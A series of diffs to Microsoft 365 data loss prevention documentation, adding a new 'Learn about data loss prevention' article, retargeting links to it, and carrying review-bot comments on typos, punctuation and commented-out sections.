- [Learn about sensitivity labels](sensitivity-labels.md) - [Learn about retention policies and retention labels](retention.md) - [Sensitive information type entity definitions.md](sensitive-information-type-entity-definitions.md)-- [Overview of data loss prevention](data-loss-prevention-policies.md)
+- [Learn about data loss prevention](dlp-learn-about-dlp.md)
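Review bot: The list this entry joins still has an item whose visible link text is "Sensitive information type entity definitions.md", with the file extension leaked into the text. Since the list is being touched anyway, drop the ".md" from the link text so it matches the other entries.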
compliance Data Loss Prevention Policies https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/data-loss-prevention-policies.md
Title: "Overview of data loss prevention"
+ Title: "Data Loss Prevention Reference"
# rename the md file to the above title f1.keywords: - CSH Previously updated : 07/12/2019 Last updated : audience: ITPro f1_keywords: - 'ms.o365.cc.DLPLandingPage'
-localization_priority: Priority
+localization_priority: low
- M365-security-compliance - SPO_Content
search.appverid:
- MET150 - seo-marvel-apr2020
-description: Learn how to identify, monitor, and automatically protect your organization's sensitive information across Office 365.
+description: data loss prevention reference material
-# Overview of data loss prevention
+# Data loss prevention reference
+
+> [!IMPORTANT]
+> This is reference topic is no longer the main resource for Microsoft 365 data loss prevention (DLP) information. The DLP content set is being updated and restructured. The topics covered in this article will be moving to new, updated articles. For more information about DLP, see [Learn about data loss prevention](dlp-learn-about-dlp.md).
+ <!-- this topic needs to be split into smaller, more coherent ones. It is confusing as it is. --> <!-- move this note to a more appropriate place, no topic should start with a note --> > [!NOTE] > Data loss prevention capabilities were recently added to Microsoft Teams chat and channel messages for users licensed for Office 365 Advanced Compliance, which is available as a standalone option and is included in Office 365 E5 and Microsoft 365 E5 Compliance. To learn more about licensing requirements, see [Microsoft 365 Tenant-Level Services Licensing Guidance](/office365/servicedescriptions/microsoft-365-service-descriptions/microsoft-365-tenantlevel-services-licensing-guidance).
-To comply with business standards and industry regulations, organizations must protect sensitive information and prevent its inadvertent disclosure. Sensitive information can include financial data or personally identifiable information (PII) such as credit card numbers, social security numbers, or health records. With a data loss prevention (DLP) policy in the Office 365 Security &amp; Compliance Center, you can identify, monitor, and automatically protect sensitive information across Office 365.
++
+<!-- MOVED TO LEARN ABOUT To comply with business standards and industry regulations, organizations must protect sensitive information and prevent its inadvertent disclosure. Sensitive information can include financial data or personally identifiable information (PII) such as credit card numbers, social security numbers, or health records. With a data loss prevention (DLP) policy in the Office 365 Security &amp; Compliance Center, you can identify, monitor, and automatically protect sensitive information across Office 365.
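Review bot: The new IMPORTANT note opens with "This is reference topic is no longer the main resource", which has a stray "is"; it should read "This reference topic is no longer the main resource". In the front matter, `description: data loss prevention reference material` is an uncapitalized fragment where the old value was a full sentence, and `localization_priority: low` is lowercase while the value it replaces (`Priority`) and the new article's `Normal` are capitalized; use the same casing. The title is also "Data Loss Prevention Reference" in the metadata but "Data loss prevention reference" in the H1, so pick one.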
With a DLP policy, you can:
With a DLP policy, you can:
- **View DLP alerts and reports showing content that matches your organizationΓÇÖs DLP policies.** To view alerts and metadata related to your DLP policies you can use the [DLP Alerts Management Dashboard](dlp-configure-view-alerts-policies.md). You can also view policy match reports to assess how your organization is complying with a DLP policy. If a DLP policy allows users to override a policy tip and report a false positive, you can also view what users have reported
-
+
+-->
+## Create and manage DLP policies
+ You create and manage DLP policies on the Data loss prevention page in the Microsoft 365 Compliance center. ![Data loss prevention page in the Office 365 Security &amp; Compliance Center](../media/943fd01c-d7aa-43a9-846d-0561321a405e.png)
-## What a DLP policy contains
+<!-- MOVED TO LEARN ABOUT ## What a DLP policy contains
A DLP policy contains a few basic things:
A DLP policy contains a few basic things:
- **Conditions** the content must match before the rule is enforced. For example, a rule might be configured to look only for content containing Social Security numbers that's been shared with people outside your organization.
- - **Actions** that you want the rule to take automatically when content matching the conditions is found. For example, a rule might be configured to block access to a document and send both the user and compliance officer an email notification.
+ - **Actions** that you want the rule to take automatically when content matching the conditions is found. For example, a rule might be configured to block access to a document and send both the user and compliance officer an email notification. -->
You can use a rule to meet a specific protection requirement, and then use a DLP policy to group together common protection requirements, such as all of the rules needed to comply with a specific regulation.
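Review bot: The `<!-- MOVED TO LEARN ABOUT ... -->` wrapper ends after the **Actions** bullet, so the paragraph "You can use a rule to meet a specific protection requirement..." stays visible while its heading, "What a DLP policy contains", is commented out; it now sits under "Create and manage DLP policies" with nothing introducing rules. Either move this paragraph with the section or leave the heading in place. Prefer deleting the moved text over commenting it out, since the history keeps it, and note that any inbound links to the commented-out heading anchors stop resolving.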
For example, you might have a DLP policy that helps you detect the presence of i
![Diagram shows that DLP policy contains locations and rules](../media/c006860c-2d00-42cb-aaa4-5b5638d139f7.png)
-### Locations
+<!-- MOVED TO LEARN ABOUT ### Locations
DLP policies are applied to sensitive items across Microsoft 365 locations and can be further scoped as detailed in this table.
DLP policies are applied to sensitive items across Microsoft 365 locations and c
|Teams chat and channel messages |accounts | |Windows 10 devices |user or group | |Microsoft Cloud App Security |instance |-
+ -->
If you choose to include specific distribution groups in Exchange, the DLP policy will be scoped only to the members of that group. Similarly excluding a distribution group will exclude all the members of that distribution group from policy evaluation. You can choose to scope a policy to the members of distribution lists, dynamic distribution groups, and security groups. A DLP policy can contain no more than 50 such inclusions and exclusions.
compliance Dlp Chrome Get Started https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/dlp-chrome-get-started.md
Use these procedures to roll out the Microsoft Compliance Extension.
To use Microsoft Compliance Extension, the device must be onboarded into endpoint DLP. Review these articles if you are new to DLP or endpoint DLP - [Learn about Microsoft Compliance Extension](dlp-chrome-learn-about.md)-- [Overview of data loss prevention](data-loss-prevention-policies.md)
+- [Learn about data loss prevention](dlp-learn-about-dlp.md)
- [Create, test, and tune a DLP policy](create-test-tune-dlp-policy.md) - [Create a DLP policy from a template](create-a-dlp-policy-from-a-template.md) - [Learn about endpoint data loss prevention](endpoint-dlp-learn-about.md)
Now that you have onboarded devices and can view the activity data in Activity e
- [Learn about Endpoint data loss prevention ](endpoint-dlp-learn-about.md) - [Using Endpoint data loss prevention ](endpoint-dlp-using.md)-- [Overview of data loss prevention](data-loss-prevention-policies.md)
+- [Learn about data loss prevention](dlp-learn-about-dlp.md)
- [Create, test, and tune a DLP policy](create-test-tune-dlp-policy.md) - [Get started with Activity explorer](data-classification-activity-explorer.md) - [Microsoft Defender for Endpoint](https://docs.microsoft.com/windows/security/threat-protection/)
compliance Dlp Chrome Learn About https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/dlp-chrome-learn-about.md
description: "The Microsoft Compliance Extension extends monitoring and control
# Learn about the Microsoft Compliance Extension (preview)
-[Endpoint data loss prevention (endpoint DLP)](endpoint-dlp-learn-about.md) extends the activity monitoring and protection capabilities of [Microsoft 365 data loss prevention (DLP)](data-loss-prevention-policies.md) to sensitive items that are on Windows 10 devices. Once devices are onboarded into the Microsoft 365 compliance solutions, the information about what users are doing with sensitive items is made visible in [activity explorer](data-classification-activity-explorer.md) and you can enforce protective actions on those items via [DLP policies](create-test-tune-dlp-policy.md).
+[Endpoint data loss prevention (endpoint DLP)](endpoint-dlp-learn-about.md) extends the activity monitoring and protection capabilities of [Microsoft 365 data loss prevention (DLP)](dlp-learn-about-dlp.md) to sensitive items that are on Windows 10 devices. Once devices are onboarded into the Microsoft 365 compliance solutions, the information about what users are doing with sensitive items is made visible in [activity explorer](data-classification-activity-explorer.md) and you can enforce protective actions on those items via [DLP policies](create-test-tune-dlp-policy.md).
Once the Microsoft Compliance Extension is installed on a Windows 10 device, organizations can monitor when a user attempts to access or upload a sensitive item to a cloud service using Google Chrome and enforce protective actions via DLP.
See [Get started with the Microsoft Compliance Extension](dlp-chrome-get-started
- [Learn about Microsoft 365 Endpoint data loss prevention](endpoint-dlp-learn-about.md) - [Getting started with Microsoft Endpoint data loss prevention](endpoint-dlp-getting-started.md) - [Using Microsoft Endpoint data loss prevention](endpoint-dlp-using.md)-- [Overview of data loss prevention](data-loss-prevention-policies.md)
+- [Learn about data loss prevention](dlp-learn-about-dlp.md)
- [Create, test, and tune a DLP policy](create-test-tune-dlp-policy.md) - [Get started with Activity explorer](data-classification-activity-explorer.md) - [Microsoft Defender for Endpoint](https://docs.microsoft.com/windows/security/threat-protection/)
compliance Dlp Conditions And Exceptions https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/dlp-conditions-and-exceptions.md
The tables in the following sections describe the conditions and exceptions that
||||| | With importance | condition: *WithImportance* <br/> exception: *ExceptIfWithImportance* | Importance | Messages that are marked with the specified importance level. | | Content character set contains words | condition: *ContentCharacterSetContainsWords* <br/> *ExceptIfContentCharacterSetContainsWords* | CharacterSets | Messages that have any of the specified character set names. |
-| Has sender override | condition: *HasSenderOverride* <br/> exception: *ExceptIfHasSenderOverride* | n/a | Messages where the sender has chosen to override a data loss prevention (DLP) policy. For more information about DLP policies see [Data loss prevention](./data-loss-prevention-policies.md). |
+| Has sender override | condition: *HasSenderOverride* <br/> exception: *ExceptIfHasSenderOverride* | n/a | Messages where the sender has chosen to override a data loss prevention (DLP) policy. For more information about DLP policies see [Learn about data loss prevention](./dlp-learn-about-dlp.md) |
| Message type matches | condition: *MessageTypeMatches* <br/> exception: *ExceptIfMessageTypeMatches* | MessageType | Messages of the specified type. | |The message size is greater than or equal to| condition: *MessageSizeOver* <br/> exception: *ExceptIfMessageSizeOver* |`Size`|Messages where the total size (message plus attachments) is greater than or equal to the specified value. **Note**: Message size limits on mailboxes are evaluated before mail flow rules. A message that's too large for a mailbox will be rejected before a rule with this condition is able to act on the message.|
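Review bot: The replacement row's description loses its closing period: it now ends "(./dlp-learn-about-dlp.md) |" where the old row ended "policies.md). |", and the other rows in the table end their descriptions with a period. Restore it, and add the comma in "For more information about DLP policies, see".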
compliance Dlp Learn About Dlp https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/dlp-learn-about-dlp.md
+
+ Title: "Learn about data loss prevention"
+f1.keywords:
+- NOCSH
+++ Last updated :
+audience: ITPro
++
+localization_priority: Normal
+
+- M365-security-compliance
+search.appverid:
+- MET150
+description: "Learn how to protect your sensitive information using Microsoft 365 data loss prevention policies and tools and take a tour through the DLP lifecycle."
++
+# Learn about data loss prevention
+
+Organizations have sensitive information under their control such as financial data, proprietary data, credit card numbers, health records, or social security numbers. To help protect this sensitive data and reduce risk, they need a way to prevent their users from inappropriately sharing it with people who shouldn't have it. This practice is called data loss prevention (DLP).
+
+In Microsoft 365, you implement data loss prevention by defining and applying DLP policies. With a DLP policy, you can identify, monitor, and automatically protect sensitive items across:
+
+- Microsoft 365 services such as Teams, Exchange, SharePoint, and OneDrive
+- Office applications such as Word, Excel, and PowerPoint
+- Windows 10 endpoints
+- non-Microsoft cloud apps
+- on-premises file shares and on-premises SharePoint.
+
+Microsoft 365 detects sensitive items by using deep content analysis, not by just a simple text scan. Content is analyzed for primary data matches to keywords, by the evaluation of regular expressions, by internal function validation, and by secondary data matches that are in proximity to the primary data match. Beyond that DLP also uses machine learning algorithms and other methods to detect content that matches your DLP policies.
+
+## DLP is part of the larger Microsoft 365 Compliance offering
+
+Microsoft 365 DLP is just one of the Microsoft 365 Compliance tools that you will use to help protect your sensitive items wherever they live or travel. You should understand the other tools in the Microsoft 365 Compliance tools set, how they interrelate, and work better together. See, [Microsoft 365 compliance tools](protect-information.md) to learn more about the information protection process.
+
+## Protective actions of DLP policies
+
+Microsoft 365 DLP policies are how you monitor the activities that users take on sensitive items at rest, sensitive items in transit, or sensitive items in use and take protective actions. For example, when a user attempts to take a prohibited action, like copying a sensitive item to an unapproved location or sharing medical information in an email or other conditions laid out in a policy, DLP can:
+
+- show a pop-up policy tip to the user that warns them that they may be trying to share a sensitive item inappropriately
+- block the sharing and, via a policy tip, allow the user to override the block and capture the users' justification
+- block the sharing without the override option
+- for data at rest, sensitive items can be locked and moved to a secure quarantine location
+- for Teams chat, the sensitive information will not be displayed
+
+All DLP monitored activities are recorded to the [Microsoft 365 Audit log](search-the-audit-log-in-security-and-compliance.md) by default and routed to [Activity explorer](data-classification-activity-explorer.md). When a user performs an action that meets the criteria of a DLP policy, and you have alerts configured, DLP provides alerts in the [DLP alert management dashboard](dlp-configure-view-alerts-policies.md).
+
+## DLP lifecycle
+
+A DLP implementation typically follows these major phases.
+
+- [Plan for DLP](#plan-for-dlp)
+- [Prepare for DLP](#prepare-for-dlp)
+- [Deploy your policies in production](#deploy-your-policies-in-production)
++
+<!--ADD DIAGRAM OF THE DLP LIFECYCLE WORK ON WITH MAS-->
+
+### Plan for DLP
+
+Microsoft 365 DLP monitoring and protection are native to the applications that users use every day. This helps to protect your organizations' sensitive items from risky activities even if your users are unaccustomed to data loss prevention thinking and practices. If your organization and your users are new to data loss prevention practices, the adoption of DLP may require a change to your business processes and there will be a culture shift for your users. But, with proper planning, testing and tuning, your DLP policies will protect your sensitive items while minimizing any potential business process disruptions.
+
+**Technology planning for DLP**
+
+Keep in mind that DLP as a technology can monitor and protect your data at rest, data in use and data in motion across Microsoft 365 services, Windows 10 devices, on-premises file shares, and on-premises SharePoint. There are planning implications for the different locations, the type of data you want to monitor and protect, and the actions to be taken when a policy match occurs.
+
+**Business processes planning for DLP**
+
+DLP policies can block prohibited activities, like inappropriate sharing of sensitive information via email. As you plan your DLP policies, you must identify the business processes that touch your sensitive items. The business process owners can help you identify appropriate user behaviors that should be allowed and inappropriate user behaviors that should be protected against. You should plan your policies and deploy them in test mode, and evaluate their impact via [activity explorer](data-classification-activity-explorer.md) first, before applying them in more restrictive modes.
+
+**Organizational culture planning for DLP**
+
+A successful DLP implementation is as much dependent on getting your users trained and acclimated to data loss prevention practices as it is on well planned and tuned policies. Since your users are heavily involved, be sure to plan for training for them too. You can strategically use policy tips to raise awareness with your users before changing the policy enforcement from test mode to more restrictive modes.
+
+<!--For more information on planning for DLP, including suggestions for deployment based on your needs and resources, see [Planning for Microsoft 365 data loss prevention](dlp-plan-for-dlp.md).-->
+
+### Prepare for DLP
+
+You can apply DLP policies to data at rest, data in use, and data in motion in locations, such as:
+
+- Exchange Online email
+- SharePoint Online sites
+- OneDrive accounts
+- Teams chat and channel messages
+- Microsoft Cloud App Security
+- Windows 10 devices
+- On-premises repositories
+
+Each one has different pre-requisites. Sensitive items in some locations, like Exchange online, can be brought under the DLP umbrella by just configuring a policy that applies to them. Others, such as on-premises file repositories require a deployment of Azure Information Protection (AIP) scanner. You'll need to prepare your environment, code draft policies, and test them thoroughly before activating any blocking actions.
+
+### Deploy your policies in production
+
+#### Design your policies
+
+Start by defining your control objectives, and how they apply across each respective workload. Draft a policy that embodies your objectives. Feel free to start with one workload at a time, or across all workloads - there's no impact yet.
+
+#### Implement policy in test mode
+
+Evaluate the impact of the controls by implementing them with a DLP policy in test mode. It's ok to apply the policy to all workloads in test mode, so that you can get the full breadth of results, but you can start with one workload if you need to.
+
+#### Monitor outcomes and fine-tune the policy
+
+While in test mode, monitor the outcomes of the policy and fine-tune it so that it meets your control objectives while ensuring you aren't adversely or inadvertently impacting valid user workflows and productivity. Here are some examples of things to fine-tune:
+
+- adjusting the locations and people/places that are in or out of scope
+- tune the conditions and exceptions that are used to determine if an item and what is being done with it matches the policy
+- the sensitive information definition/s
+- the actions
+- the level of restrictions
+- add new controls
+- add new people
+- add new restricted apps
+- add new restricted sites
+
+#### Enable the control and tune your policies
+
+Once the policy meets all your objectives, turn it on. Continue to monitor the outcomes of the policy application and tune as needed. In general, policies take effect about an hour after being turned on. <!--See, LINK TO topic for SLAs for location specific details-- >
+
+## DLP policy configuration overview
+
+You have flexibility in how you create and configure your DLP policies. You can start from a predefined template and create a policy in just a few clicks or you can design your own from the ground up. No matter which you choose, all DLP policies require the same information from you.
+
+1. **Choose what you want to monitor** - Microsoft 365 comes with many predefined policy templates to help you get started or you can create a custom policy.
+ - A predefined policy template: Financial data, Medical and health data, Privacy data all for various countries and regions.
+ - A custom policy that uses the available sensitive information types, retention labels, and sensitivity labels.
+2. **Choose where you want to monitor** - You pick one or more locations that you want DLP to monitor for sensitive information. You can monitor:
+
+location | include/exclude by|
+|||
+|Exchange email| distribution groups|
+|SharePoint sites |sites |
+|OneDrive accounts |accounts or distribution groups |
+|Teams chat and channel messages |accounts |
+|Windows 10 devices |user or group |
+|Microsoft Cloud App Security |instance |
+|On-premises repositories| repository file path|
+
+3. **Choose the conditions that must be matched for a policy to be applied to an item** - you can accept pre-configured conditions or define custom conditions. Some examples are:
+
+- item contains a specified kind of sensitive information that is being used in a certain context. For example, 95 social security numbers being emailed to recipient outside your org.
+- item has a specified sensitivity label
+- item with sensitive information is shared either internally or externally
+
+4. **Choose the action to take when the policy conditions are met** - The actions depend on the location where the activity is happening. Some examples are:
+
+- SharePoint/Exchange/OneDrive: Block people who are outside your organization form accessing the content. Show the user a tip and send them an email notification that they are taking an action that is prohibited by the DLP policy.
+- Teams Chat and Channel: Block sensitive information from being shared in the chat or channel
+- Windows 10 Devices: Audit or restrict copying a sensitive item to a removeable USB device
+- Office Apps: Show a popup notifying the user that they are engaging in a risky behavior and block or block but allow override.
+- On-premises file shares: move the file from where it is stored to a quarantine folder
+
+> [!NOTE]
+> The conditions and the actions to take are defined in an object called a Rule.
+
+<!--## Create a DLP policy
+
+All DLP policies are created and maintained in the Microsoft 365 Compliance center. See, INSERT LINK TO ARTICLE THAT WILL START WALKING THEM THROUGH THE POLICY CREATION PROCEDURES for more information.-->
+
+After you create a DLP policy in the Compliance Center, it's stored in a central policy store, and then synced to the various content sources, including:
+
+- Exchange Online, and from there to Outlook on the web and Outlook.
+- OneDrive for Business sites.
+- SharePoint Online sites.
+- Office desktop programs (Excel, PowerPoint, and Word).
+- Microsoft Teams channels and chat messages.
+
+After the policy's synced to the right locations, it starts to evaluate content and enforce actions.
+
+## Viewing policy application results
+
+DLP reports a vast amount of information into Microsoft 365 from monitoring, policy matches and actions, and user activities. You'll need to consume and act on that information to tune your policies and triage actions taken on sensitive items. The telemetry goes into the [Microsoft 365 Compliance center Audit Logs](search-the-audit-log-in-security-and-compliance.md#search-the-audit-log-in-the-compliance-center) first, is processed, and makes its way to different reporting tools. Each reporting tool has a different purpose.
+
+### DLP Alerts Dashboard
+
+When DLP takes an action on a sensitive item, you can be notified of that action via a configurable alert. Rather than having these alerts pile up in a mailbox for you to sift through, the Compliance center makes them available in the [DLP Alerts Management Dashboard](dlp-configure-view-alerts-policies.md). Use the DLP Alerts dashboard to configure alerts, review them, triage them and track resolution of DLP Alerts. Here's an example of alerts generated by policy matches and activities from Windows 10 devices.
+
+> [!div class="mx-imgBorder"]
+> ![Alert info](../media/Alert-info-1.png)
+
+You can also view details of the associated event with rich metadata in the same dashboard
+
+> [!div class="mx-imgBorder"]
+> ![event info](../media/Event-info-1.png)
+
+### Reports
+
+The [DLP reports](view-the-dlp-reports.md#view-the-reports-for-data-loss-prevention) show broad trends over time and give specific insights into:
+
+- **DLP Policy Matches** over time and filter by date range, location, policy, or action
+- **DLP incident matches** also shows matches over time, but pivots on the items rather than the policy rules.
+- **DLP false positives and overrides** shows the count of false positives and, if configured, user-overrides along with the user justification.
+
+### DLP Activity Explorer
+
+The Activity explorer tab on the DLP page has the *Activity* filter preset to *DLPRuleMatch*. Use this tool to review activity related to content that contains sensitive info or has labels applied, such as what labels were changed, files were modified, and matched a rule.
+
+![screenshot of the DLPRuleMatch scoped activity explorer ](../media/dlp-activity-explorer.png)
+
+For more information, see [Get started with activity explorer](data-classification-activity-explorer.md)
+
+To learn more about Microsoft 365 DLP, see:
+
+- [Learn about Microsoft 365 Endpoint data loss prevention](endpoint-dlp-learn-about.md)
+- [Learn about the default data loss prevention policy in Microsoft Teams (preview)](dlp-teams-default-policy.md)
+- [Learn about the Microsoft 365 data loss prevention on-premises scanner (preview)](dlp-on-premises-scanner-learn.md)
+- [Learn about the Microsoft Compliance Extension (preview)](dlp-chrome-learn-about.md)
+- [Learn about the data loss prevention Alerts dashboard](dlp-alerts-dashboard-learn.md)
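Review bot: Two of the added sentences end without a period: "You can also view details of the associated event with rich metadata in the same dashboard" and "For more information, see [Get started with activity explorer](data-classification-activity-explorer.md)". The closing clause of the Activity Explorer paragraph, "such as what labels were changed, files were modified, and matched a rule", is also not parallel; something like "such as which labels were changed, which files were modified, and which items matched a rule" reads cleanly. In the Reports list, the first bullet ("**DLP Policy Matches** over time and filter by ...") has no verb, while the other two bullets start with "shows", so align it with them. The alt text "screenshot of the DLPRuleMatch scoped activity explorer " carries a trailing space.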
compliance Dlp Microsoft Teams https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/dlp-microsoft-teams.md
To learn more about licensing requirements, see [Microsoft 365 Tenant-Level Serv
## Overview of DLP for Microsoft Teams
-Recently, [data loss prevention](data-loss-prevention-policies.md) (DLP) capabilities were extended to include Microsoft Teams chat and channel messages, **including private channel messages**.
+Recently, [data loss prevention](dlp-learn-about-dlp.md) capabilities were extended to include Microsoft Teams chat and channel messages, **including private channel messages**.
> [!IMPORTANT] > DLP currently applies only to the actual messages in the chat or channel thread. Activity notifications -- which include a short message preview and appear based on a user's notification settings -- are **not** included in Teams DLP at this time. Any sensitive information present in the part of the message that appears in the preview will remain visible in the notification even after the DLP policy has been applied and removed sensitive information the message itself.
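Review bot: The replacement sentence under "Overview of DLP for Microsoft Teams" drops the "(DLP)" expansion that the removed line had, yet the IMPORTANT note immediately after it uses "DLP" as an already-defined abbreviation. Keep "(DLP)" after the link, as the Endpoint DLP and non-Microsoft cloud apps intros elsewhere in this change set still do. While this section is open, the unchanged note ends "removed sensitive information the message itself", which is missing "from".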
Returning to our example, where a sender shared a social security number in a Te
> [!div class="mx-imgBorder"] > ![Message blocked](../media/dlp-teams-blockedmessage-notification-to-user.png)
-The **What's this?** link opens an [article](data-loss-prevention-policies.md) about DLP policies, which helps explain why the message was blocked.
- ### To customize policy tips To perform this task, you must be assigned a role that has permissions to edit DLP policies. To learn more, see [Permissions](data-loss-prevention-policies.md#permissions).
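Review bot: The "What's this?" sentence is deleted outright here, whereas every other data-loss-prevention-policies.md link in this change set is retargeted, so the page no longer says where that link in the policy tip leads. If the tip still shows the link, keep the sentence and point it at dlp-learn-about-dlp.md. The Permissions link on the following context line still targets data-loss-prevention-policies.md#permissions; confirm that anchor still exists now that the article is being retitled "Data loss prevention reference".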
compliance Dlp On Premises Scanner Get Started https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/dlp-on-premises-scanner-get-started.md
Now that you have deployed a test policy for DLP on-premises locations and can v
- [Learn about DLP on-premises scanner (preview)](dlp-on-premises-scanner-learn.md) - [Use DLP on-premises scanner (preview)](dlp-on-premises-scanner-use.md)-- [Overview of data loss prevention](data-loss-prevention-policies.md)
+- [Learn about data loss prevention](dlp-learn-about-dlp.md)
- [Create, test, and tune a DLP policy](create-test-tune-dlp-policy.md) - [Get started with Activity explorer](data-classification-activity-explorer.md) - [Microsoft 365 subscription](https://www.microsoft.com/microsoft-365/compare-microsoft-365-enterprise-plans?rtc=1)
compliance Dlp On Premises Scanner Learn https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/dlp-on-premises-scanner-learn.md
description: "Microsoft 365 data loss prevention on-premises scanner extends mon
# Learn about the Microsoft 365 data loss prevention on-premises scanner (preview)
-Microsoft data loss prevention on-premises scanner is part of the Microsoft 365 data loss prevention (DLP) suite of features that you can use to discover and protect sensitive items across Microsoft 365 services. For more information about all of MicrosoftΓÇÖs DLP offerings, see [Overview of data loss prevention](data-loss-prevention-policies.md).
+Microsoft data loss prevention on-premises scanner is part of the Microsoft 365 data loss prevention (DLP) suite of features that you can use to discover and protect sensitive items across Microsoft 365 services. For more information about all of MicrosoftΓÇÖs DLP offerings, see [Learn about data loss prevention](dlp-learn-about-dlp.md).
The **DLP on-premises scanner** crawls on-premises data-at-rest in file shares and SharePoint document libraries and folders for sensitive items that, if leaked, would pose a risk to your organization or pose a risk of compliance policy violation. This gives you the visibility and control you need to ensure that sensitive items are used and protected properly, and to help prevent risky behavior that might compromise them. The DLP on-premises scanner detects sensitive information by using [built-in](sensitive-information-type-entity-definitions.md) or [custom sensitive information](create-a-custom-sensitive-information-type.md) types, [sensitivity labels](sensitivity-labels.md) or file properties. The information about what users are doing with sensitive items is made visible in [activity explorer](data-classification-activity-explorer.md) and you can enforce protective actions on those items via [DLP policies](create-test-tune-dlp-policy.md).
Now that you've learned about DLP on-premises scanner, your next steps are:
- [Getting started with the Microsoft data loss prevention on-premises scanner](dlp-on-premises-scanner-get-started.md) - [Use the Microsoft data loss prevention on-premises scanner](dlp-on-premises-scanner-use.md)-- [Overview of data loss prevention](data-loss-prevention-policies.md)
+- [Learn about data loss prevention](dlp-learn-about-dlp.md)
- [Create, test, and tune a DLP policy](create-test-tune-dlp-policy.md) - [Get started with Activity explorer](data-classification-activity-explorer.md)
compliance Dlp On Premises Scanner Use https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/dlp-on-premises-scanner-use.md
To help familiarize you with DLP on-premises features and how they surface in DL
> [!IMPORTANT] > These DLP on-premises scenarios are not the official procedures for creating and tuning DLP policies. Refer to the below topics when you need to work with DLP policies in general situations:
->- [Overview of data loss prevention](data-loss-prevention-policies.md)
+>- [Learn about data loss prevention](dlp-learn-about-dlp.md)
>- [Get started with the default DLP policy](get-started-with-the-default-dlp-policy.md) >- [Create a DLP policy from a template](create-a-dlp-policy-from-a-template.md) >- [Create, test, and tune a DLP policy](create-test-tune-dlp-policy.md)
If you want to enforce DLP rules on the scanned files, enforcement must be enabl
- [Learn about DLP on-premises scanner (preview)](dlp-on-premises-scanner-learn.md) - [Get started with DLP on-premises scanner (preview)](dlp-on-premises-scanner-get-started.md)-- [Overview of data loss prevention](data-loss-prevention-policies.md)
+- [Learn about data loss prevention](dlp-learn-about-dlp.md)
- [Create, test, and tune a DLP policy](create-test-tune-dlp-policy.md) - [Get started with Activity explorer](data-classification-activity-explorer.md)
compliance Dlp Teams Default Policy https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/dlp-teams-default-policy.md
description: "Learn about the default data loss prevention policy in Microsoft T
# Learn about the default data loss prevention policy in Microsoft Teams (preview)
-[Data loss prevention](data-loss-prevention-policies.md) (DLP) capabilities have been extended to include Microsoft Teams chat and channel messages, including private channel messages. As a part of this release, we created a default DLP policy for first-time customers to Compliance center.
+[Data loss prevention](dlp-learn-about-dlp.md) capabilities have been extended to include Microsoft Teams chat and channel messages, including private channel messages. As a part of this release, we created a default DLP policy for first-time customers to Compliance center.
## Applies to
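Review bot: The new opening sentence removes "(DLP)" after the link, but the same paragraph goes on to say "default DLP policy" without the abbreviation having been introduced. Restore the parenthetical after the retargeted link, for example "[Data loss prevention](dlp-learn-about-dlp.md) (DLP) capabilities ...".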
compliance Dlp Use Policies Non Microsoft Cloud Apps https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/dlp-use-policies-non-microsoft-cloud-apps.md
description: Learn how to use dlp policies for non-Microsoft cloud apps.
# Use data loss prevention policies for non-Microsoft cloud apps (preview)
-Data loss prevention (DLP) policies to non-Microsoft cloud apps are part of the Microsoft 365 DLP suite of features; using these features, you can discover and protect sensitive items across Microsoft 365 services. For more information about all Microsoft DLP offerings, see [Overview of data loss prevention](./data-loss-prevention-policies.md?view=o365-worldwide).
+Data loss prevention (DLP) policies to non-Microsoft cloud apps are part of the Microsoft 365 DLP suite of features; using these features, you can discover and protect sensitive items across Microsoft 365 services. For more information about all Microsoft DLP offerings, see [Learn about data loss prevention](dlp-learn-about-dlp.md).
You can use DLP policies to non-Microsoft cloud apps to monitor and detect when sensitive items are used and shared via non-Microsoft cloud apps. Using these policies gives you the visibility and control that you need to ensure that they're correctly used and protected, and it helps prevent risky behavior that might compromise them.
compliance Endpoint Dlp Configure Proxy https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/endpoint-dlp-configure-proxy.md
Related topics
- [Learn about Endpoint data loss prevention ](endpoint-dlp-learn-about.md) - [Using Endpoint data loss prevention ](endpoint-dlp-using.md)-- [Overview of data loss prevention](data-loss-prevention-policies.md)
+- [Learn about data loss prevention](dlp-learn-about-dlp.md)
- [Create, test, and tune a DLP policy](create-test-tune-dlp-policy.md) - [Get started with Activity explorer](data-classification-activity-explorer.md) - [Microsoft Defender for Endpoint](/windows/security/threat-protection/)
compliance Endpoint Dlp Getting Started https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/endpoint-dlp-getting-started.md
description: "Set up Microsoft 365 Endpoint data loss prevention to monitor file
# Get started with Endpoint data loss prevention
-Microsoft Endpoint data loss prevention (Endpoint DLP) is part of the Microsoft 365 data loss prevention (DLP) suite of features you can use to discover and protect sensitive items across Microsoft 365 services. For more information about all of MicrosoftΓÇÖs DLP offerings, see [Overview of data loss prevention](data-loss-prevention-policies.md). To learn more about Endpoint DLP, see [Learn about Endpoint data loss prevention](endpoint-dlp-learn-about.md)
+Microsoft Endpoint data loss prevention (Endpoint DLP) is part of the Microsoft 365 data loss prevention (DLP) suite of features you can use to discover and protect sensitive items across Microsoft 365 services. For more information about all of MicrosoftΓÇÖs DLP offerings, see [Learn about data loss prevention](dlp-learn-about-dlp.md). To learn more about Endpoint DLP, see [Learn about Endpoint data loss prevention](endpoint-dlp-learn-about.md)
Microsoft Endpoint DLP allows you to monitor Windows 10 devices and detect when sensitive items are used and shared. This gives you the visibility and control you need to ensure that they are used and protected properly, and to help prevent risky behavior that might compromise them.
Now that you have onboarded devices and can view the activity data in Activity e
- [Learn about Endpoint data loss prevention ](endpoint-dlp-learn-about.md) - [Using Endpoint data loss prevention ](endpoint-dlp-using.md)-- [Overview of data loss prevention](data-loss-prevention-policies.md)
